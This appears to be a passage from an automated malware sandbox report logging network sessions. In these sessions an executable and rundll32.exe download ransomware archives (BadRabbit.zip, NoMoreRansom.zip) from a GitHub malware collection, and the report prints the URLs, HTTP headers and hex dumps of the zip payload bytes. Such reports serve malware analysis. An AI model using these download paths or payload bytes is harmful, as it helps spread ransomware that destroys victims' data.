                                                                                                                                                            Data Ascii: J/"$Ig~qe\\G9hU0){rO#2elRgiW.]`eMsYf;Cm*#Y!t"/a}M]-aTNyy%Q}M(C4n,Jv/MmwzG-dqnHHG{Qj0S?ogVkO5[
                                                                                                                                                            2022-09-29 12:44:49 UTC1168INData Raw: 77 8f 84 bc 58 35 a6 bb 88 b1 f0 db af e7 13 aa 31 8b cb bc 9f d7 06 04 7f 3c 6c 70 95 f0 80 fc 2d 7f 89 b3 52 fd df 59 3f c7 32 f4 8b ab 20 1a 82 83 29 d6 3e 64 7e 5a 61 f2 2d 31 66 e1 c6 20 8d 20 1c 4d f1 79 7c af 83 cf ac 52 d2 3d 4c 88 0f 06 e1 5a 9d b4 25 83 d2 d4 b5 72 e3 8a f7 63 88 67 a2 98 9e c5 0a bd 7c e1 5c 79 7a 55 f2 c1 12 89 08 68 14 41 9d 2e f6 27 ce fb 04 c3 9f b5 91 46 95 d8 e2 d7 24 de b9 f1 06 c0 e7 1a 49 35 66 05 90 4b ea b0 ad a9 c7 c9 2d fc d9 4e 92 83 37 94 92 46 9e 0f 46 33 6b c9 c9 1f b2 b6 0d 8c ba 5c 42 30 84 72 d2 91 ec 9b d8 bd 5d 9c 89 db fd 83 a9 60 44 a5 86 2d d9 cd b1 3b e4 71 5f 33 ce a8 8d be a3 37 3d f0 6f 4c 72 49 a4 1b 10 56 a3 3b ac ff cb b2 9a 8c 60 8d 51 20 05 9d 2e 29 46 f1 b8 8f 41 1c 11 59 85 8b 74 20 97 0f 1a
                                                                                                                                                            Data Ascii: wX51<lp-RY?2 )>d~Za-1f My|R=LZ%rcg|\yzUhA.'F$I5fK-N7FF3k\B0r]`D-;q_37=oLrIV;`Q .)FAYt
                                                                                                                                                            2022-09-29 12:44:49 UTC1170INData Raw: 9c 6d f9 e7 6a 05 78 60 43 3a ae 4f c8 bd d4 99 fd 43 25 bb 0c 43 ce 48 67 45 23 bd 54 ed 8b 01 b0 2b 2d 16 56 55 a5 bb 5b 09 1b ca 3c 84 d9 3a af 4d ae 6c 80 a4 53 18 ea fc 3e fe 7c 59 a4 1d 5f 33 aa 13 67 82 b4 b9 b1 bf 28 19 71 1b 8a 00 16 19 1f b2 20 fa 2c 6a 68 77 e5 96 dc fc 38 76 0e 91 72 c6 fb 40 5c ef 1a ed 71 42 1d e2 23 47 17 13 35 36 ae 59 9b 79 56 b7 64 84 0b 27 53 d4 7c d7 4c bc 92 89 2a bb b4 4b 8b c1 0a 37 4b 06 50 05 1e 8c 9a 41 c7 95 50 4d 16 62 5b 53 d7 d4 c5 61 b3 03 ee 8e 90 d9 81 ff b1 b9 48 86 43 a5 6a 5e ee 47 da a4 b9 6f df d5 8c 61 3d 0a a2 8f 95 c4 5b 58 e4 02 2b 8f ec 45 01 7c d1 99 5a 40 5f 85 5d 4f 3d 31 39 62 0b dc 6f 1b 2b d6 75 c0 c1 b1 ac 30 cc af f7 8a ca 2d 87 70 d0 22 83 21 b6 55 85 86 09 f2 91 bf 93 05 7f 7d f2 ac 4b
                                                                                                                                                            Data Ascii: mjx`C:OC%CHgE#T+-VU[<:MlS>|Y_3g(q ,jhw8vr@\qB#G56YyVd'S|L*K7KPAPMb[SaHCj^Goa=[X+E|Z@_]O=19bo+u0-p"!U}K
                                                                                                                                                            2022-09-29 12:44:49 UTC1170INData Raw: 89 4f 0e 02 30 8e 80 58 34 85 06 20 67 88 7a 4a 60 ca 65 1f 4a d8 fc 72 0c 7e 6d 05 1b e6 95 51 87 a3 00 48 ea 75 49 f2 20 59 3b 74 55 08 be e1 b4 90 82 8d d2 6d 2b 50 02 f8 12 c4 5d 62 44 23 be a5 01 03 31 ac 33 53 68 bd 4d e1 66 c1 cc b6 95 16 c5 1f dc 49 61 02 aa e5 aa 82 d4 e6 59 8e c1 cc 54 90 c6 be d7 0a 0c 2f 6a e7 98 31 23 fc 36 83 21 a8 e4 31 ea eb c7 42 47 03 bb 62 db 44 d2 e7 6d 8f 1f 52 fc 20 a8 a0 1d 00 ae 69 03 90 e9 88 d6 f3 52 4f a7 3c f3 22 6f e4 a0 94 1c 08 d4 bb 00 5e d6 2e e5 ab 8e d6 04 d1 24 95 2d 51 49 97 5b 19 3a d7 c0 2f 33 fe 25 23 5c a3 2a bb 20 cb d5 ea 09 ca 48 b0 25 04 c0 18 f7 e6 b5 17 35 9e 40 a9 63 8c 00 cf f5 d5 c0 2b 87 b4 5f 72 4f 0a 62 4c c6 cf 7c 71 bf 5c 88 0d ae 14 25 04 24 7b 55 91 b7 44 67 fc 75 6b 08 d3 4a b6 43
                                                                                                                                                            Data Ascii: O0X4 gzJ`eJr~mQHuI Y;tUm+P]bD#13ShMfIaYT/j1#6!1BGbDmR iRO<"o^.$-QI[:/3%#\* H%5@c+_rObL|q\%${UDgukJC
                                                                                                                                                            2022-09-29 12:44:49 UTC1171INData Raw: dd c7 f0 a9 f7 87 06 13 35 ad c2 9b 66 ed 16 a6 ad c9 76 77 ec 46 64 1f 00 4d 8a ca 25 d1 f2 af 47 e2 f1 63 2a 75 ed af 71 73 4d 75 d6 f9 77 7c 22 28 26 44 91 86 9d fd 1b db 54 26 8c d7 22 e5 a6 f9 b6 7c 66 09 0f 76 27 ae fc 3b 6b c2 f0 61 52 54 3a af cf 86 4d 02 b3 69 17 0e 4f 5b 15 2d b6 dd d6 67 75 2d f1 28 f1 b1 fb bd a0 8e 23 8d 5f 1c f0 fa e2 82 a0 db 70 56 7a 3b 54 e5 cf b5 ad b3 eb 37 5e b6 79 b6 a7 e2 19 2a 14 0f 1b 19 14 8b 8c d4 1b 6b 34 6a 67 51 95 50 58 09 ef 5f 36 c7 0b d5 e5 9d 76 f7 5a d2 f7 4a 24 51 d4 0c 0d e7 e5 6b 60 46 65 8a a6 b4 a1 0b 31 a7 2b b3 2d 9d a1 ab 3f c6 75 15 e8 1d 39 b8 07 85 42 c8 5b 8b 78 95 73 d8 9f 8b 86 dc fc 72 28 4d d1 e8 c0 1f ff a7 8e bc 6d 2a 9c 75 47 ef 9f d3 a2 15 5a 4b 91 7a 99 a9 dd 58 f5 ef 3e f9 f5 a4 08
                                                                                                                                                            Data Ascii: 5fvwFdM%Gc*uqsMuw|"(&DT&"|fv';kaRT:MiO[-gu-(#_pVz;T7^y*k4jgQPX_6vZJ$Qk`Fe1+-?u9B[xsr(Mm*uGZKzX>
                                                                                                                                                            2022-09-29 12:44:49 UTC1173INData Raw: 2c 43 dd be a8 19 69 ac fd 36 14 dd 41 cb de d8 c2 e4 8d 17 03 85 be 1e 44 84 98 f2 b3 06 cb 2e 88 77 34 ca 41 f3 83 c8 4c d0 1b 63 73 00 99 ff 6a fa d4 0d 72 de 4a b2 41 e0 c3 88 c5 2a 48 ce 28 d4 3a 7f 17 38 06 41 e4 0e 23 01 b1 18 43 06 39 b5 8b d2 74 4c 4d 3e da 3a f0 25 65 13 0e 18 ab b9 b0 bc 7f 0f d4 d3 cd 67 65 c6 9e cf 52 40 82 35 37 cf cb 28 dd 28 e2 e0 b1 d9 1f 77 03 c2 76 d0 de 31 ba a6 89 2e 71 cc ce 75 33 3b 80 f3 e8 2c ef 1c e0 d3 db 88 23 e1 b7 99 1d 45 9d 1f 26 f3 3f 6c 95 79 b1 85 85 e2 b7 95 17 7b c5 39 8a aa 48 3b 6b dc bb 8f 23 ac 9d 86 cb 97 2a 40 8f 48 0e 42 c3 82 36 19 7c 4e e3 b2 9f 51 7c 2c bf 18 0a 99 0a 33 99 99 13 84 7e 2b 86 f8 26 42 1b 72 9b 0c b6 d0 6d 29 55 b4 63 16 cf 06 87 75 10 31 2b e5 ba af d1 2e ec c8 ce 8b ab dc 96
                                                                                                                                                            Data Ascii: ,Ci6AD.w4ALcsjrJA*H(:8A#C9tLM>:%egeR@57((wv1.qu3;,#E&?ly{9H;k#*@HB6|NQ|,3~+&Brm)Ucu1+.
                                                                                                                                                            2022-09-29 12:44:49 UTC1174INData Raw: f3 4c 99 98 b5 a9 f4 43 30 44 22 4d 41 9a fb 99 7a 03 7e d7 83 68 ed 8d 50 e0 d1 af 66 a8 0a 65 99 44 4c 1b 94 e4 d1 35 71 c0 0c 16 1c 19 33 d9 af be 3a fb 99 ba 96 de ba 1e bd fe d1 b9 1e f3 b5 08 b3 a2 ac 5d 61 06 84 b3 47 5d c8 f3 d9 12 e1 1f 62 f2 7f ee d5 e7 d9 58 e6 63 5e b8 6c ed f0 0f b0 a9 f4 bf 77 c8 54 b1 f9 26 3a 73 01 8c bc 48 87 9c 31 47 b9 1a 3c b8 61 18 bc 13 c9 f6 a6 fb 56 2d 77 4c b8 a0 26 33 65 42 d4 9c c2 57 f6 dc 18 8f 02 d2 89 0b 2f bf 70 db 58 2f 89 8d 10 7c e4 19 9f 66 8b 2c 86 48 77 ab 66 55 db b5 61 7c ba 51 87 10 76 0b b4 82 2a 38 d2 ed 0d 33 1e e6 2f f3 2f 91 28 63 1d 36 68 96 e5 e9 b9 34 83 ba 4a 4b 0e 9b fe c8 11 f6 ca 90 72 fc 99 b7 47 57 5a 02 0a 2d 62 ab de 88 46 be 43 25 92 c7 c9 c0 6b e4 cd 16 1e da 3d a6 66 57 0f 82 41
                                                                                                                                                            Data Ascii: LC0D"MAz~hPfeDL5q3:]aG]bXc^lwT&:sH1G<aV-wL&3eBW/pX/|f,HwfUa|Qv*83//(c6h4JKrGWZ-bFC%k=fWA
                                                                                                                                                            2022-09-29 12:44:49 UTC1175INData Raw: 42 4b cd 96 a8 d6 09 13 d9 09 1e 0f 37 cd 18 fd 12 66 bb 91 60 de d4 4f 69 62 1d 08 88 33 24 97 9b b1 18 8b 52 4c 8f 20 fd d1 95 cf d4 a3 3f bd 8d ae 2e 24 c5 f8 ab 9c fe 64 d1 88 a4 90 38 94 d6 e5 34 d5 a9 af 25 ab ea 70 72 74 12 2a b5 1e 65 cb a2 79 43 d4 2d 71 5a a2 b6 39 8c 01 29 5e b8 10 79 e1 2a 5e de 87 4c 63 f5 c7 43 f3 ce 4d 57 e2 9b ee 04 3d cb 0c 39 ee cf c9 90 18 f7 7e 4f b2 88 d1 c3 0c fc 14 e3 d4 87 e2 b7 0a f8 c1 a3 5f 3d 42 5e d9 14 4b f9 d5 b3 06 7b 10 42 15 fa ce ce 5c e6 58 8a b6 4a ec 06 b1 86 31 0f 0a d1 e4 60 c5 31 7a 4d d7 5a 27 56 64 90 0d 61 ae 82 a5 46 f7 54 10 d4 a1 32 20 0c 1e 97 75 e6 47 59 ae 66 b4 d3 9e 71 97 51 67 c1 a9 6c e8 0e 2c ea 0f ce f2 2b c2 37 f6 e8 56 6c d4 54 16 88 0b da 8c cc 62 6a 8d 07 4e 7b 2b d1 eb fe bd 35
                                                                                                                                                            Data Ascii: BK7f`Oib3$RL ?.$d84%prt*eyC-qZ9)^y*^LcCMW=9~O_=B^K{B\XJ1`1zMZ'VdaFT2 uGYfqQgl,+7VlTbjN{+5
                                                                                                                                                            2022-09-29 12:44:49 UTC1177INData Raw: 49 30 4f 0c 42 80 b7 f7 19 9d be cc 46 67 7f b2 65 f9 08 7e 0e 18 7d 8d 31 0a 50 d3 2a 7a 72 40 3e a1 84 71 fe 44 6d 96 e0 79 79 49 23 40 1f 12 38 77 7a 90 66 b8 a5 f0 f6 b6 f1 99 8d 40 ce 58 c3 ab 6f 96 d3 4a a8 c2 fa 8e 23 9d e4 6c 1c 96 bd bc f5 8a 42 99 b7 d8 1e 53 64 14 a9 c0 de af 43 b8 0c 30 d1 e8 e7 24 71 f4 85 04 a7 96 2e 34 23 d3 49 ce 85 b6 8b 68 08 3d 0f 58 8d ac 88 7d d1 50 d6 ee d1 39 e7 33 d3 dc 4a 32 7f 44 cb 26 56 09 57 56 49 c6 e6 c7 78 25 5e a1 3d 29 95 05 ce 74 f9 73 23 41 35 a2 c4 e3 ad e1 c6 6b dd 46 b4 89 95 33 9f a9 72 fa 8e d4 41 8e 55 b4 f9 6f 4f 71 c3 c0 97 88 1b 31 2e a1 62 ec ac 7f fc f0 33 06 8e 13 d0 6c 84 92 a1 69 d1 ba 31 2d ff 3c 89 17 19 25 ce a1 c6 1a 70 ed 9d 9b 6d e3 68 cd 49 f0 db 43 15 5f ab 55 9a fb 6b 65 3d 86 1b
                                                                                                                                                            Data Ascii: I0OBFge~}1P*zr@>qDmyyI#@8wzf@XoJ#lBSdC0$q.4#Ih=X}P93J2D&VWVIx%^=)ts#A5kF3rAUoOq1.b3li1-<%pmhIC_Uke=
                                                                                                                                                            2022-09-29 12:44:49 UTC1178INData Raw: 5b 84 4f b9 5f 7f 21 0b aa 48 14 92 9f ee a9 a2 68 03 bf 5f 63 56 80 84 93 86 87 43 cc 56 2b 83 88 a1 8f f4 8e fb 24 12 8c 0e 29 e1 a6 45 89 ae bc 40 8a a8 12 b0 a1 81 e1 2b c9 7d b9 3a 10 85 d2 c8 50 81 71 e3 41 5a 78 e6 f1 6f 28 ca ce f5 fc 26 91 ae 88 1a a2 91 bb 4b ac 72 f6 f6 1d ea 4d 71 c8 31 91 63 ba 34 db 2d a3 46 d8 b6 5f ac 43 71 ef cb 5b 5d bf a6 5d 15 db a0 98 6b 68 93 c4 15 10 66 fb 40 e1 31 1a ad 53 6a 71 f9 91 64 18 90 db 92 bf 6e 0a f0 b6 a8 55 c3 aa 59 0d f6 0b ce f4 ff 47 21 73 43 df 0a 14 b6 d6 ea cb c4 b3 46 76 59 0c 31 f4 82 e4 70 04 d7 b6 b0 28 de 16 03 2f 47 51 98 35 16 d7 2a ea 83 88 c6 81 f2 ca 8d ff 03 e6 9d dd be f1 3b 5a d7 3f e4 28 7f d3 fd 10 0e de ee ce fc d6 f9 af 35 66 c8 63 ce 34 2d 1e 63 dd 1f 70 22 a1 78 f0 a8 77 e6 74
                                                                                                                                                            Data Ascii: [O_!Hh_cVCV+$)E@+}:PqAZxo(&KrMq1c4-F_Cq[]]khf@1SjqdnUYG!sCFvY1p(/GQ5*;Z?(5fc4-cp"xwt
                                                                                                                                                            2022-09-29 12:44:49 UTC1180INData Raw: 69 06 43 75 c0 71 a4 bd cd eb cd f5 d7 d0 aa 7e 02 b4 bd ff a9 c1 e0 71 bb 06 ec 1a 5e fa 01 7e 5d 9c d5 ee 25 90 c8 0a f8 f7 5c f5 99 34 c0 e3 ba 5a ff 24 0d c6 be b5 4d 36 ec fd a4 c3 6d 94 6e 7c 43 0e 2d 61 a7 70 21 61 80 bc 33 3e 0e a6 14 ee c9 7d 06 d4 be 19 c6 3b 76 a0 3a e5 ed 0b 8e 5a 1c 0d 21 78 be ce b8 e4 85 bd 13 09 05 bf 9b 89 e5 9c c2 2d fd f3 bf 7a 70 10 57 fd 4d d8 48 ce fb 92 10 67 04 1e e8 08 c7 95 a5 5e e5 4b 55 61 f7 1a aa d1 40 e5 ef d5 b8 f0 3d 1b b3 14 7e 86 29 d9 d8 72 5d 09 5e 96 8f e1 c9 21 ed 50 e4 e1 db 86 27 4c b9 54 b5 8b e5 77 9f 12 5b 8d cc 83 4e 6c bf f9 10 a0 10 97 be e3 d9 39 b1 08 31 d8 b6 f7 8c ce f2 24 65 a1 12 5f 03 a7 0d e5 15 ce af 6c b1 ee e3 68 63 e4 58 c7 30 d2 4c 66 0a c8 dc da d0 e8 84 ac f6 cf af 62 77 b6 24
                                                                                                                                                            Data Ascii: iCuq~q^~]%\4Z$M6mn|C-ap!a3>};v:Z!x-zpWMHg^KUa@=~)r]^!P'LTw[Nl91$e_lhcX0Lfbw$


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            3140.82.121.4443192.168.2.649709C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:42 UTC1INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:43:02 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:44:42 UTC2INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            30192.168.2.649723140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:54 UTC1181OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            31140.82.121.4443192.168.2.649723C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:54 UTC1181INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:54 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:44:54 UTC1181INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            32192.168.2.649724185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:54 UTC1183OUTGET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            33185.199.110.133443192.168.2.649724C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:54 UTC1183INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 938498
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "a8e6304ff5320ec60c4e2f8e3ebb31e42a5adf4691dfa4eaa6f24b4dad08bbfd"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: D4EA:67BC:3D674:FA8B9:63359346
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:54 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6956-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455494.384300,VS0,VE265
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 2158c75a5d3b5e59091e359aad477e0c4b5e15be
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:49:54 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:44:54 UTC1184INData Raw: 50 4b 03 04 14 00 01 00 08 00 98 82 ba 4a dc 69 b2 15 46 51 0e 00 00 ca 15 00 1b 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 4e 6f 4d 6f 72 65 52 61 6e 73 6f 6d 2e 65 78 65 b5 26 50 b8 1f d7 f7 5c 00 a2 4a af d9 76 74 a7 44 28 27 ef 18 69 bb ab c2 21 d8 7d 8d cf 83 56 8f 2f be 64 10 fd 69 17 eb d0 5e f2 d1 6a a5 9a e0 56 c4 b3 e4 ff ef a6 06 ea d6 bb 64 6b 3f ea f9 6f 23 d2 9f e5 e4 cd 7d d2 36 bb 46 c8 f4 08 1a 00 0f 17 49 5a 2b cf 96 7e c2 48 0e 6c 80 6f ea ba 11 a3 fc ab 7a 93 b5 f5 72 91 10 54 4a a5 5e c7 31 ec 37 cb 13 62 26 42 d9 40 f7 43 ab dd a9 a1 a0 e4 29 c6 f9 df 33 34 5d 1a c8 97 96 7e cd dd d4 6d d2 f7 59 b8 fe 1d 7d fb 12 f3 50 a2 72 b6 cf dc 3e fb 7a ff 18 09 a8 c1 22 05 34 54 9a 3e dc 1b c6 15 06 cb f9 a0 a0 5c 0d b6 3f e9 b8 c9 45 cc d1 03
                                                                                                                                                            Data Ascii: PKJiFQEndermanch@NoMoreRansom.exe&P\JvtD('i!}V/di^jVdk?o#}6FIZ+~HlozrTJ^17b&B@C)34]~mY}Pr>z"4T>\?E
                                                                                                                                                            2022-09-29 12:44:54 UTC1185INData Raw: 8f 51 ef 9a 13 32 e0 6a a5 1c 6b 8d 46 dd 80 f7 0c e0 e9 06 3b cf b7 80 a4 34 00 f1 dd ce dd 89 6e 16 17 14 27 c1 30 7f 09 bb 51 a7 68 10 82 fe d7 fa 10 d7 6b 77 5b 29 43 95 99 55 67 17 40 c8 01 3f 1f af fd a3 06 32 78 b4 d9 6e 50 8a 94 c5 0b 1b 29 d4 e9 03 c6 25 75 0a 65 61 97 53 a3 e6 25 7f c9 41 49 8b f5 b4 52 ca 0e 29 28 09 b6 54 ce a0 07 26 20 4d 23 76 df 0f 91 b9 dd 85 a7 17 cc 9c 09 83 cd 3b cc 7f 75 86 42 7f 7c ae 89 e9 11 fe 37 49 60 9a 92 b3 e9 0a 85 c2 84 66 96 43 a0 08 e9 12 f1 86 29 d1 fd 6d 11 b2 72 9c 2c e1 7f 6c 2e 5d 33 f3 da 43 5a 42 44 78 67 70 a0 0c 88 27 21 85 23 32 c0 80 e8 60 89 cb e5 f9 0f 3a ef d7 cf c3 fe 77 54 63 2b 65 20 2c 6a f1 d5 6b 00 2b 21 1c 35 9c 2f ba 21 21 c4 b8 e5 2e 17 2f 63 72 e8 f1 e4 22 80 e9 03 f5 df 52 88 7c bf
                                                                                                                                                            Data Ascii: Q2jkF;4n'0Qhkw[)CUg@?2xnP)%ueaS%AIR)(T& M#v;uB|7I`fC)mr,l.]3CZBDxgp'!#2`:wTc+e ,jk+!5/!!./cr"R|
                                                                                                                                                            2022-09-29 12:44:54 UTC1187INData Raw: c9 bb 93 d4 21 ae db b3 7e f7 5d 47 1d 3b 97 c6 0c 89 72 5a 63 6f a4 f9 4a 0a 94 ef 4d 42 e8 5e 8e 00 62 2b 24 56 5f d6 79 ab 67 88 e8 da 2e 3b ca a5 49 ab c0 03 71 fd ef a2 3c c0 89 6b ba a7 75 69 60 86 e7 f2 75 60 d5 10 06 08 59 3e c8 98 76 f8 16 2b 63 32 36 e5 f8 a2 bd ad 58 26 0b 65 7d 72 07 a1 f3 cc e2 19 d8 1e 54 2e 04 34 9a ce 8b d9 ed 8f eb e7 f5 9d ef 34 87 81 3c 62 3d 4b e2 80 e7 c2 e4 13 fa bf 55 9c b9 2b df 54 c4 62 4d 80 3c 7a c7 7e ff d9 4c 54 8d df f4 12 1b ad ef 59 f6 52 09 e4 7f c1 17 57 82 07 2f 7b 30 82 e7 77 37 a0 2e 76 65 2c 9c f2 c4 f3 5a fd 0d 7d 42 bb 26 d7 c8 c9 2e 1f 03 4a 42 ba bf 24 d1 85 13 64 01 46 d0 04 24 ab 34 cd ae 7b 01 90 85 45 e9 07 65 96 ef 2a c6 5d 42 5a bc cd 5a 8d 1b 84 c2 03 d4 79 37 9f 3a 91 ec 39 7a 64 42 6a 97
                                                                                                                                                            Data Ascii: !~]G;rZcoJMB^b+$V_yg.;Iq<kui`u`Y>v+c26X&e}rT.44<b=KU+TbM<z~LTYRW/{0w7.ve,Z}B&.JB$dF$4{Ee*]BZZy7:9zdBj
                                                                                                                                                            2022-09-29 12:44:54 UTC1188INData Raw: 98 b9 e5 68 92 db 22 0b b1 fa 44 78 da 49 85 45 85 17 60 35 10 c6 09 55 93 f7 24 4f ea ee 81 7c 8c 8a 0e f9 8a 94 96 cd 94 70 2e ae 14 70 60 ca e9 b6 89 56 a9 e9 f6 9c ff f8 f1 93 80 46 9c 86 ef 5a 05 41 02 64 14 08 73 07 99 b9 97 1a 8c 78 9f d8 1a 0f 0a da c4 dd 91 36 30 11 a8 17 b2 cf 5c ff 1e 84 e9 7b 2d 26 93 dd 77 34 5b 6e 5f f7 5e 64 14 8d 31 57 21 c2 99 fe 03 87 2d 9f fd 7f 15 a6 c5 9d ba 81 6d a0 b9 d2 bc 29 81 a5 25 bf ce 3a 91 cd 44 61 c1 8d ef be 1d b7 20 69 6d 2c 9d d2 f0 cf 51 00 d4 2d 1d 5e c6 dd ac 4f 43 3e c1 12 31 b3 8d 39 e1 fb 85 2b 32 d7 65 0b 8c bb ef cb 71 4b fa ba 96 1c 1d 25 85 25 e2 28 4b 43 db 04 43 84 5a 53 94 88 f5 14 40 55 70 6d 3d 8c cc d2 bf 89 06 df 49 26 4f f6 ce f7 7f a1 77 f1 a1 43 2c 89 2c f3 78 57 95 25 cb 51 0f fb 57
                                                                                                                                                            Data Ascii: h"DxIE`5U$O|p.p`VFZAdsx60\{-&w4[n_^d1W!-m)%:Da im,Q-^OC>19+2eqK%%(KCCZS@Upm=I&OwC,,xW%QW
